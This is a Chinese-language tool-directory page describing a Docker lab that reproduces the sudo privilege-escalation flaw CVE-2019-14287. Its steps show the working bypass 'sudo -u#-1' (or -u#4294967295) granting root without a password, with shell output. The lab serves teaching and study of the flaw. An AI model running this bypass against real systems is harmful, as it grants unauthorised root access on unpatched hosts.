Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
poc-cve-2019-14287 — 基于Docker的PoC,演示CVE-2019-14287 sudo权限提升漏洞,通过Runas用户限制绕过,并提供逐步复现说明。 | Kitploit
工具/GitHubGitHub/lemonadern/poc-cve-2019-14287
权限提升容器安全漏洞分析漏洞利用学习与教育实验室与实践
GitHublemonadern/poc-cve-2019-14287

poc-cve-2019-14287

基于Docker的PoC,演示CVE-2019-14287 sudo权限提升漏洞,通过Runas用户限制绕过,并提供逐步复现说明。

查看仓库
141年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2019-14287 的 PoC

概述

这是一个在 Docker 容器上复现 sudo 漏洞 (CVE-2019-14287) 的示例。

练习步骤

  1. 使用 docker compose up -d 启动容器
  2. 使用 docker exec -it vulnerable_sudo_app bash 进入容器
  3. 执行 whoami 和 id 命令,确认自己是普通用户(非 root)
    root@kitploit:~
    $ whoami
    user1
    $ id
    uid=1000(user1) gid=1000(user1) groups=1000(user1)
    $ id -u
    1000
    
  4. 确认无法执行 sudo -u#0 whoami 和 sudo -u#0 id -u
    • 指定 uid(-u 选项)为 0 (root) 执行
    • 提示输入密码,但由于不知道密码,无法执行
    root@kitploit:~
    $ sudo -u#0 whoami
    [sudo] password for user1:
    $ sudo -u#0 id
    [sudo] password for user1:
    $ sudo -u#0 id -u
    [sudo] password for user1:
    
  5. 执行 sudo -u#-1 whoami 和 sudo -u#-1 id -u,确认可以在无需认证的情况下以 root 身份执行命令(复现漏洞)
    • 使用 -u#4294967295 也可以实现同样效果
    root@kitploit:~
    $ sudo -u#-1 whoami
    root
    $ sudo -u#-1 id
    uid=0(root) gid=1000(user1) groups=1000(user1)
    $ sudo -u#-1 id -u
    0
    

参考

  • CVE - CVE-2019-14287
  • Potential bypass of Runas user restrictions | Sudo
  • sudoの脆弱性(CVE-2019-14287)についてまとめてみた - Qiita
下载工具